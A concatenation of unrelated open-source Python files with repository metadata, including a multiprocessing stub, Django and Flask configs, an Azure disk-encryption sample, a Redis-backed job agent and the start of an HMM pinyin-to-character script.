085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025
| 2015-12-10T08:56:33
| 2015-12-10T08:56:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,156
|
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports the buffer interface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file descriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file descriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"sirnikolasd@yandex.ru"
] |
sirnikolasd@yandex.ru
|
3230e906d4b1aa90eb08e3bde5029121942a2cbd
|
7f3d3d02c3ab6e14e72ba4852828071af37088b5
|
/unicorn/utils.py
|
28b212cd4e1e3a2979ad7dbf787622b52a3ff4c3
|
[
"MIT"
] |
permissive
|
phantasy-project/unicorn
|
cf28b936e2a11ba551724fda8ad7f72da129b661
|
25d790adb1c4390eb715249dc94423228997f3a4
|
refs/heads/master
| 2021-10-27T06:23:33.688585
| 2021-10-15T19:28:01
| 2021-10-15T19:28:01
| 150,592,912
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
# -*- coding: utf-8 -*-
import pickle
import codecs
import xlrd
import numpy as np
import sys
from collections import namedtuple
DATA_X_COL_IDX = 7
DATA_Y_COL_IDX = 8
UniFunc = namedtuple('UniFunc',
'name ename from_field to_field description args code code_str data_x data_y')
def pickle_obj(obj, coding='base64'):
"""Pickle object into string for being a REST parameter.
"""
return codecs.encode(pickle.dumps(obj), coding).decode()
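# Round-trip sketch (the receiving side is an assumption, not shown in this
# module): the object can be recovered by reversing the encoding:
#
#   s = pickle_obj([1, 2, 3])
#   obj = pickle.loads(codecs.decode(s.encode(), 'base64'))
#   assert obj == [1, 2, 3]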
class UnicornData(object):
"""Parsing data from external xlsx file.
Examples
--------
>>> f = 'data.xlsx'
>>> data = UnicornData(f)
>>> for f in data.functions:
>>> client.create(**f)
>>> # client is an AdminClient instance
>>>
"""
def __init__(self, xlsx_file, **kws):
try:
book = xlrd.open_workbook(xlsx_file)
except Exception:
print("Failed to open xlsx file.")
sys.exit(1)
self.data_x_col_idx = kws.get('data_x_col_idx', DATA_X_COL_IDX)
self.data_y_col_idx = kws.get('data_y_col_idx', DATA_Y_COL_IDX)
self.sheet = book.sheet_by_index(0)
self.ncols, self.nrows = self.sheet.ncols, self.sheet.nrows
self.header = [x.value for x in self.sheet.row(0)]
self.functions = self.generate_functions()
def generate_functions(self):
for ridx in range(1, self.nrows):
row = [v.value for v in self.sheet.row(ridx)]
x_raw = row[self.data_x_col_idx]
row[self.data_x_col_idx] = pickle_obj(
np.array([float(v) for v in x_raw.split()]))
y_raw = row[self.data_y_col_idx]
row[self.data_y_col_idx] = pickle_obj(
np.array([float(v) for v in y_raw.split()]))
f = dict(zip(self.header, row))
yield to_tuple(f)
def to_tuple(f):
"""Convert dict *f* to namedTuple.
"""
attr = {k: v for k, v in f.items()}
attr['code_str'] = attr['code']
attr['code'] = get_func(attr['code'])
return UniFunc(**attr)
def get_func(fstr):
"""Return function object from code.
"""
fncode, ns = compile(fstr, "<string>", "exec"), {}
exec(fncode, ns)
return ns.get('f')
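# Sketch: get_func expects the code string to define a function named 'f':
#
#   double = get_func("def f(x):\n    return 2 * x")
#   assert double(3) == 6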
def to_dict(d):
ret = {}
for k,v in d.items():
try:
ret[k] = float(v)
except:
ret[k] = v
return ret
|
[
"zhangt@frib.msu.edu"
] |
zhangt@frib.msu.edu
|
78db018846126fb9febd6f19a4e4506f2d44c459
|
4ea4f9f8cbb652aea7f82089eb39b8a86a466a81
|
/lib/muchos/config/__init__.py
|
13294f17e2ca9040fc4f68596eaa0a65f18d19d9
|
[
"Apache-2.0"
] |
permissive
|
shannawaz/fluo-muchos
|
62ef9bf65baae3a823630fc11e35b4620aac2056
|
98102a5b14a71642a7972d20d57b38373a375577
|
refs/heads/master
| 2020-09-24T02:40:37.204495
| 2020-03-24T18:06:38
| 2020-03-24T18:06:38
| 225,641,914
| 0
| 0
|
Apache-2.0
| 2019-12-03T14:37:26
| 2019-12-03T14:37:26
| null |
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from muchos.config.base import BaseConfig, SERVICES, OPTIONAL_SERVICES
from muchos.config.existing import ExistingDeployConfig
from muchos.config.ec2 import Ec2DeployConfig
from muchos.config.azure import AzureDeployConfig
from configparser import ConfigParser
def DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name):
c = ConfigParser()
c.read(config_path)
cluster_type = c.get('general', 'cluster_type')
if cluster_type == 'existing':
return ExistingDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'ec2':
return Ec2DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'azure':
return AzureDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
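# Usage sketch (all paths and the cluster name are placeholders): the factory
# returns an ExistingDeployConfig, Ec2DeployConfig, or AzureDeployConfig
# depending on the cluster_type entry in the [general] section of the config:
#
#   config = DeployConfig('./deploy', 'muchos.props', 'hosts/mycluster',
#                         'checksums', 'templates', 'mycluster')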
|
[
"kturner@apache.org"
] |
kturner@apache.org
|
d4198914f012849544bc1c5edb24c3a5c7164a20
|
6151a3c25988eb4eac0c00289b90b2e42d4960eb
|
/homeworks/HW01/tests/q3.1.4.py
|
169c9f8d67015fae9fa40c7ff6828bffde9e7c4e
|
[] |
no_license
|
BC-COMS-2710/summer21-material
|
8e3bbbb375433fa0b575cf39eed4bdf2d3b486d3
|
f07ffc1595d7a924a5fca0636161ded26b28e655
|
refs/heads/master
| 2023-05-28T22:52:25.941752
| 2021-06-10T14:44:42
| 2021-06-10T14:44:42
| 353,820,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
test = { 'name': 'q3.1.4',
'points': [0.1, 0.1],
'suites': [ { 'cases': [ {'code': '>>> assert easiest_fres_pres != ...;\n>>> assert easiest_fres_year != ...\n', 'hidden': False, 'locked': False},
{'code': '>>> assert type(easiest_fres_pres) == str;\n>>> assert "int" in str(type(easiest_fres_year))\n', 'hidden': False, 'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
[
"azpoliak@gmail.com"
] |
azpoliak@gmail.com
|
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372
| 2017-06-28T05:03:32
| 2017-06-28T05:03:32
| 63,019,677
| 0
| 0
| null | 2022-11-22T01:00:25
| 2016-07-10T21:44:41
|
CSS
|
UTF-8
|
Python
| false
| false
| 475
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
|
[
"baoyuyang@Yuyangs-MacBook-Pro.local"
] |
baoyuyang@Yuyangs-MacBook-Pro.local
|
03221d11ae596056771dd6a40155d30b9efb8bb4
|
7d98a40b425bfae9cac908d227a90e040300f3e8
|
/app/main/errors.py
|
5d2f11e1532ea3e234aa61423854b6769a8a9f4b
|
[
"MIT",
"ODbL-1.0"
] |
permissive
|
jmeydam/alternative-destinations
|
b999b340590fa0ceb162e5de1b2170e510affb31
|
dec000db45a8005ff5408bc9756ea13f821b52f1
|
refs/heads/master
| 2020-04-13T20:17:53.900399
| 2019-10-24T16:01:27
| 2019-10-24T16:01:27
| 163,426,383
| 0
| 0
|
MIT
| 2019-10-25T11:19:45
| 2018-12-28T15:52:02
|
Python
|
UTF-8
|
Python
| false
| false
| 253
|
py
|
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@main.app_errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
|
[
"jmeydam@gmail.com"
] |
jmeydam@gmail.com
|
401fa3bf6245f4b4d4def26da033aa3a82b885bf
|
57588093c6ed6dff087d71073eabb061210bd5eb
|
/myproject/urls.py
|
22a7f73fecef274020ae45dcdcdc6d96f784f13a
|
[] |
no_license
|
python-ottawa/opag
|
a2249a0da49af586c01934f9cf9e6596815d8733
|
66ea38475974f0e0edf04c3e9b86e612fedf8fb8
|
refs/heads/master
| 2021-07-03T14:47:36.498972
| 2015-06-24T22:27:32
| 2015-06-24T22:27:32
| 35,083
| 2
| 1
| null | 2021-06-10T17:27:49
| 2008-07-18T01:11:44
|
HTML
|
UTF-8
|
Python
| false
| false
| 715
|
py
|
from django.conf.urls.defaults import *
from django.contrib import admin
from django.conf import settings
admin.autodiscover()
urlpatterns = patterns('',
# Admin access
(r'^admin/', include(admin.site.urls)),
# Default handler is the main app.
(r'', include('myproject.main.urls'))
)
if settings.DEVELOPMENT:
# If in development mode
urlpatterns += patterns('',
# To serve static content in development.
(r'^static/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.STATIC_ROOT}),
)
handler404 = 'myproject.main.views.notfound'
handler500 = 'myproject.main.views.servererror'
|
[
"msoulier@digitaltorque.ca"
] |
msoulier@digitaltorque.ca
|
3678b34fa02bf2efb255c7b1a52c9d39e07c3bfb
|
b78c255d1c8b917c21bf689f5f9153d765fbe195
|
/dogpack/apps/2d/advection/rotating_unst/plotq2_unst.py
|
7daa00269f64d5c3e12163634a8895661de93be2
|
[] |
no_license
|
smoe1/ImplicitExplicit
|
8be586bed84b1a661e5fe71f5b063dcd406643fa
|
2b9a2d54110ca0f787d4252b9a8cc6d64b23b08d
|
refs/heads/master
| 2016-09-08T02:39:48.371767
| 2015-09-15T21:15:08
| 2015-09-15T21:15:08
| 41,374,555
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
#----------------------------------------------------------
def plotq2_unst(outputdir, n1, m, meqn, NumPhysElems, NumPhysNodes,
xlow, xhigh, ylow, yhigh, time, x, y,
tnode, qsoln, xmid, ymid, qsoln_elem):
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
from math import pow
from math import cos
from math import sin
from math import pi
plt.figure(1)
plt.clf()
plt.gca().set_aspect('equal')
plt.gca().set_xlim([xlow,xhigh])
#plt.gca().set_ylim([ylow,yhigh])
p1=plt.tripcolor(x, y, tnode, qsoln[:,m], shading='faceted', vmin=0.0, vmax=1.0)
tmp1 = "".join(("q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.colorbar()
plt.draw()
x0 = -0.25*cos(2.0*pi*time) + 0.50
y0 = 0.25*sin(2.0*pi*time) + 0.50
r = np.zeros(NumPhysElems,float)
for i in range(0,NumPhysElems):
r[i] = sqrt(pow(xmid[i]-x0,2)+pow(ymid[i]-y0,2))
ind = r.argsort()
qscat_ex = np.zeros((NumPhysElems,meqn),float)
qex(NumPhysElems,meqn,r,qscat_ex)
err = np.linalg.norm(qscat_ex[:,m]-qsoln_elem[:,m])/np.linalg.norm(qscat_ex[:,m])
print ""
print " Error = ",'{:e}'.format(err)
print ""
plt.figure(2)
plt.clf()
plt.gca().set_aspect('auto')
plt.gca().set_xlim([0.0,0.5])
#plt.gca().set_ylim([0.0,1.0])
plt.plot(r[ind],qscat_ex[ind,m],'k-')
plt.plot(r[ind],qsoln_elem[ind,m],'bo')
tmp1 = "".join(("Scattor plot of q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.draw()
#----------------------------------------------------------
#----------------------------------------------------------
def qex(NumPhysElems,meqn,r,qscat_ex):
from math import pow
from math import cos
from math import pi
for i in range(NumPhysElems):
if (r[i]<0.2):
qscat_ex[i,0] = pow( cos(5.0/2.0*pi*r[i]) ,6)
#----------------------------------------------------------
|
[
"smoe@uw.edu"
] |
smoe@uw.edu
|
afa6b518a0c6de01cc70441c23e6ca16e0edd3b8
|
74d1757d8788d5892a8853b15749391fdf9c1a6a
|
/TaskAPI/TaskAPI/urls.py
|
4ba00b3c745c334f8fa19b18ffbc3b133f84f7e8
|
[] |
no_license
|
gogobook/TaskAPI
|
e3139a70f2f5257c83a590e13005ac4f7740f1d4
|
9b918659bba4aa562000219ef65dbce21a363f10
|
refs/heads/master
| 2020-06-30T23:46:14.955729
| 2016-11-23T09:31:13
| 2016-11-23T09:31:13
| 74,561,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""TaskAPI URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from django.conf.urls.static import static
from . import settings
from TaskApp import views
# Define API routes with a SimpleRouter
router = routers.SimpleRouter()
router.register(r'task', views.TaskViewSet)
urlpatterns = [
url(r'^',include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"O968041428@gmail.com"
] |
O968041428@gmail.com
|
086aebcfe4c9dc2fee2d104a55ae67c41c0a5a78
|
a9c9316fe425dac911ca6b3e33d2c76c48e428b3
|
/maro/cli/process/agent/job_agent.py
|
9949099a4a06c3dc64c4c01c928c20c7d4ebcf1d
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
00mjk/maro
|
a64601d5c43a7e6808b1cab1c19be15595395ce1
|
05a64a67fee7d2c4198a57593c464d64e0a8ce7f
|
refs/heads/master
| 2023-03-11T16:58:54.043497
| 2021-02-10T15:31:58
| 2021-02-10T15:31:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,593
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_pending_ticket()
time.sleep(self.check_interval)
def _check_pending_ticket(self):
# Check pending job ticket
pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
for job_name in pending_jobs:
job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
# Start pending job only if current running job's number less than parallel level.
if int(parallel_level) > running_jobs_length:
self._start_job(job_detail)
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
def _start_job(self, job_details: dict):
command_pid_list = []
for component_type, command_info in job_details["components"].items():
component_number = command_info["num"]
component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
for number in range(component_number):
job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
if not os.path.exists(job_local_path):
os.makedirs(job_local_path)
with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
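                    # shell=True wraps the command in a shell process, so record the
                    # PID of the shell's child (the actual job) for later liveness
                    # checks and kills.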
command_pid = get_child_pid(proc.pid)
command_pid_list.append(command_pid)
self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
self._shutdown_count = 0
        self._countdown = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown"))
def run(self):
while True:
self._check_job_status()
time.sleep(self.check_interval)
keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
if not keep_alive:
self._close_agents()
def _check_job_status(self):
running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
for running_job, pid_list in running_jobs.items():
# Check pid status
still_alive = False
for pid in pid_list:
if psutil.pid_exists(pid):
still_alive = True
# Update if no pid exists
if not still_alive:
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)
def _close_agents(self):
if (
not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
):
self._shutdown_count += 1
else:
self._shutdown_count = 0
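        # Shut down only after the idle state has lasted for `agent_countdown`
        # consecutive checks, so a brief gap between jobs does not kill the agents.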
if self._shutdown_count >= self._countdown:
agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
# close agent
close_by_pid(pid=agent_pid, recursive=True)
# Set agent status to 0
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_kill_ticket()
time.sleep(self.check_interval)
def _check_kill_ticket(self):
        # Check killed job tickets
killed_job_names = self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1)
for job_name in killed_job_names:
if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
pid_list = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, job_name))
close_by_pid(pid=pid_list, recursive=False)
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, job_name)
else:
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, job_name)
class MasterAgent:
def __init__(self):
setting_info = load_setting_info()
self.check_interval = setting_info["check_interval"]
self.redis_connection = redis.Redis(
host=setting_info["redis_info"]["host"],
port=setting_info["redis_info"]["port"]
)
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())
def start(self) -> None:
"""Start agents."""
pending_job_agent = PendingJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
pending_job_agent.start()
killed_job_agent = KilledJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
killed_job_agent.start()
job_tracking_agent = JobTrackingAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
job_tracking_agent.start()
if __name__ == "__main__":
master_agent = MasterAgent()
master_agent.start()
|
[
"noreply@github.com"
] |
00mjk.noreply@github.com
|
0e20b8dd3e3ed1558f602d3055cc0b3c37906bf2
|
50df6586213af876ee741be559434537b1ef03ef
|
/first/second.py
|
ff1e56b06a3fb21265e3ceeb8b06c36996b077d9
|
[] |
no_license
|
ujjwalagr/HacktoberFest
|
e4329550cb320f4b3a369a91e4de51857b6e4755
|
884d5993c8ac30a4af23d213f3b22002eb7bd39b
|
refs/heads/master
| 2020-08-08T15:11:47.778438
| 2019-10-09T08:10:36
| 2019-10-09T08:10:36
| 213,856,036
| 0
| 2
| null | 2019-10-13T08:37:07
| 2019-10-09T07:56:08
|
Python
|
UTF-8
|
Python
| false
| false
| 16
|
py
|
print('second')
|
[
"ujjwalagrawal53@gmail.com"
] |
ujjwalagrawal53@gmail.com
|
70044d57fced0a79461899cfe23e9212aef8c5de
|
1dafc27c7f754f936135ef8614ab291854034022
|
/samples/compute/disable_manage_disk_encryption_set.py
|
2d93c612d3dc60bada457e5fdc07c1f45c83cea8
|
[
"MIT"
] |
permissive
|
ArunAyyagari/azure-samples-python-management
|
6f329b35e71939a5539e164e55097a15c6d7dea6
|
cfe187ce49aad35d84d0a61ba6d3ef156095ff0c
|
refs/heads/master
| 2022-08-29T03:10:47.894017
| 2020-05-25T02:32:18
| 2020-05-25T02:32:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from dateutil import parser as date_parse
from azure.identity import DefaultAzureCredential
from azure.keyvault.keys import KeyClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.keyvault import KeyVaultManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
TENANT_ID = os.environ.get("AZURE_TENANT_ID", None)
DISK_ENCRYPTION_SET_NAME = "diskencryptionsetxxx"
GROUP_NAME = "testgroupx"
KEY_VAULT = "keyvaultxyzxxxxx"
# Create client
# For other authentication approaches, please see: https://pypi.org/project/azure-identity/
    resource_client = ResourceManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id=SUBSCRIPTION_ID
    )
    compute_client = ComputeManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id=SUBSCRIPTION_ID
    )
    keyvault_client = KeyVaultManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id=SUBSCRIPTION_ID
    )
# Create resource group
resource_client.resource_groups.create_or_update(
GROUP_NAME,
{"location": "eastus"}
)
# Create key
vault = keyvault_client.vaults.create_or_update(
GROUP_NAME,
KEY_VAULT,
{
'location': "eastus",
'properties': {
'sku': {
'name': 'standard'
},
'tenant_id': TENANT_ID,
"access_policies": [
{
"tenant_id": TENANT_ID,
"object_id": "123743cc-88ef-49ee-920e-13958fe5697d",
"permissions": {
"keys": [
"encrypt",
"decrypt",
"wrapKey",
"unwrapKey",
"sign",
"verify",
"get",
"list",
"create",
"update",
"import",
"delete",
"backup",
"restore",
"recover",
"purge"
]
}
}
],
'enabled_for_disk_encryption': True,
}
}
).result()
    key_client = KeyClient(vault.properties.vault_uri, DefaultAzureCredential())
expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
key = key_client.create_key(
"testkey",
"RSA",
size=2048,
expires_on=expires_on
)
# Create disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_create_or_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"location": "eastus",
"identity": {
"type": "SystemAssigned"
},
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
}
}
).result()
print("Create disk encryption set:\n{}".format(encryption_set))
    # Get disk encryption set
encryption_set = compute_client.disk_encryption_sets.get(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Get disk encryption set:\n{}".format(encryption_set))
# Update disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
},
"tags": {
"department": "Development",
"project": "Encryption"
}
}
).result()
print("Update disk encryption set:\n{}".format(encryption_set))
# Delete disk encryption set
compute_client.disk_encryption_sets.begin_delete(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Delete disk encryption set.\n")
# Delete Group
resource_client.resource_groups.begin_delete(
GROUP_NAME
).result()
if __name__ == "__main__":
main()
|
[
"sunkaihuisos@gmail.com"
] |
sunkaihuisos@gmail.com
|
5260c2df4a64f3a54d8b18ae12abc281fe8a4af7
|
06d09ea58ce1cfc0501ed598dbecda4273597567
|
/HMM/process_finally.py
|
601d32af19718cde39116fa35d48b669077234a8
|
[] |
no_license
|
SunflowerAries/Pinyin-to-Character
|
0c0abdbf7cc07d902f43ad9c3b8103e887a483e2
|
363faaf1b3f3fb3addce11f2b3d4bc9af62f588f
|
refs/heads/master
| 2020-11-30T08:28:48.738699
| 2020-01-12T14:20:05
| 2020-01-12T14:20:05
| 230,356,429
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,914
|
py
|
# coding: utf-8
import json, codecs
BASE_START_FILE = 'data/base_start.json'
BASE_EMISSION_FILE = 'data/base_emission.json'
BASE_TRANSITION_FILE = 'data/base_transition.json'
ALL_STATES_FILE = 'data/all_states.txt'  # all characters (hidden states)
ALL_OBSERVATIONS_FILE = 'data/all_observations.txt'  # all pinyin syllables (observations)
PY2HZ_FILE = 'data/pinyin2hanzi.txt'
HZ2PY_FILE = 'hanzipinyin.txt'
FIN_PY2HZ_FILE = 'data/hmm_py2hz.json'
FIN_START_FILE = 'data/hmm_start.json'
FIN_EMISSION_FILE = 'data/hmm_emission.json'
FIN_TRANSITION_FILE = 'data/hmm_transition.json'
PINYIN_NUM = 411.
HANZI_NUM = 20903.
def writejson2file(obj, filename):
    with open(filename, 'w') as fout:
        json.dump(obj, fout, sort_keys=True)

def readdatafromfile(filename):
    with open(filename, 'r') as fin:
        return json.load(fin)
def gen_py2hz():
data = {}
